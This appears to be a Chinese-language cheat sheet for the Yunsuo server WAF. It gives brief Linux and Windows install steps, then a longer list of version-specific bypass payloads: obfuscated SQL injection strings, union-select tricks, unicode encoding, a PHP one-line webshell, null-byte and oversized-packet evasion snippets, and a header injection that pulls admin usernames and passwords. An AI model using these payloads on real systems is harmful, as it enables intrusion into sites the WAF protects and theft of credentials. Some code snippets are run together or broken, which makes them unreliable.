安装
安装 - Linux
前提: 检查selinux状态 - 关闭selinuxgetenforce #显示为disabled则为关闭1.下载x86:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_32bit.tar.gz && tar xvzf yunsuo_agent_32bit.tar.gz && chmod +x yunsuo_install/install && yunsuo_install/installx64:wget http://download.yunsuo.com.cn/v3/yunsuo_agent_64bit.tar.gz && tar xvzf yunsuo_agent_64bit.tar.gz && chmod +x yunsuo_install/install && 2.解压chmod +x yunsuo_install/install3.在当前路径下执行安装yunsuo_install/install 4.添加服务器到云中心。 /usr/local/yunsuo_agent/yunsuo_smart_tool.sh -u cloud_name -p cloud_passwd注:cloud_name:云中心账户名;cloud_passwd:云中心登录密码5.查看状态ps -ef | grep yunsuo_agent相关命令云锁启动/停止/重启/运行状态service yunsuo start/stop/restart/status/etc/init.d/yunsuo start/stop/restart/status卸载/usr/local/yunsuo_agent/uninstall
安装 - Windos
下载 http://download.yunsuo.com.cn/v3/%E4%BA%91%E9%94%81%E6%9C%8D%E5%8A%A1%E5%99%A8%E7%AB%AF(%E5%AE%89%E8%A3%85%E5%9C%A8%E6%9C%8D%E5%8A%A1%E5%99%A8%E4%B8%8A).exe
免杀
GET POST转换 + 空格替换
针对过滤不完全情况 搜索框 + SQL注入 + 字符型
?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23 ?type=2%0A%09%0B%0C%0D/**//**//**//**//**//**//**/and%0A%09%0B%0C%0D/**//**//**//**//**//**//**/(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/1%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from(select%0A%09%0B%0C%0D/**//**//**//**//**//**//**/count(*),concat(user(),floor(rand(0)*2))x%0A%09%0B%0C%0D/**//**//**//**//**//**//**/from%0A%09%0B%0C%0D/**//**//**//**//**//**//**/information_schema.tables%0A%09%0B%0C%0D/**//**//**//**//**//**//**/group%0A%09%0B%0C%0D/**//**//**//**//**//**//**/by%0A%09%0B%0C%0D/**//**//**//**//**//**//**/x)y)%23
union select + ()绕过
?id=-1union(select 1,2,3,@@datadir,5,6,7,8,9,10,11,12,13,14,15,16,17)
union select + '' + /**/ + ) + # 绕过
?id='/*')union select user,database() from users%23*/&submit=Submit#
IIS + 字符编码绕过 - unicode
asp?t=112 %u00aand(s%u00f0lect top 1 eventname_en from eventshelp) > 0 WideChar和MultiByte字符转换问题 - 2002年
一句话 + 菜刀 绕过
$_REQUEST['a']($_REQUEST['b']);?>
1.3.145版本 - 包冗余绕过
超过7250byte的部分不被检测
1.3.145版本 - \x00 绕过
GET型def getdata(n): data = 'name=\x00test' data += '&id=select 1 from table' return dataPOST型def postdata(n) data = '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n' data += '------'WebKitFormBoundarycMYRelX1B2H69xy9\r\n' data += '%27abcd\r\n' data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n' data += 'Content-Disposition: form-data; name="submit"\r\n\r\n' data += 'select 1 from table\r\n' data += '------WebKitFormBoundarycMYRelX1B2H69xy9\r\n' return dataCOOKIE型header = { 'User-Agent' : 'letmetest', 'Content-Type' : 'multipart/form-data: boundary=----WebKitFormBoundarycMYRelX1B2H69xy9' 'X-forwarded-For' : 'select 1 from table'} 1.3.145版本 - E0绕过
?id=8E0union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#?id=8E0union%20select%201,2,3,admin_name,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43%20from%20qs_admin#
1.3.191版本 - E0 + /**/ + current_user 绕过
?id=8E0union/*123*/select/*123*/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#?id=8E0union/*123*/select/*123*/1,2,3,current_user,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43#
1.4.121版本 - 默认对post、cookie不检测,对header字段未做防护
Header头 - Client-ip注入Client-ip: 1.2.3.4 'or @ `'` AND (SELECT 1 FROM (SELECT count(1),concat(round(rand(0)),(SELECT concat(username,0x23,password) FROM pm_admin LIMIT 0,1)) a FROM information_schema.tablesGROUP by a)b) or @ `'` and ''='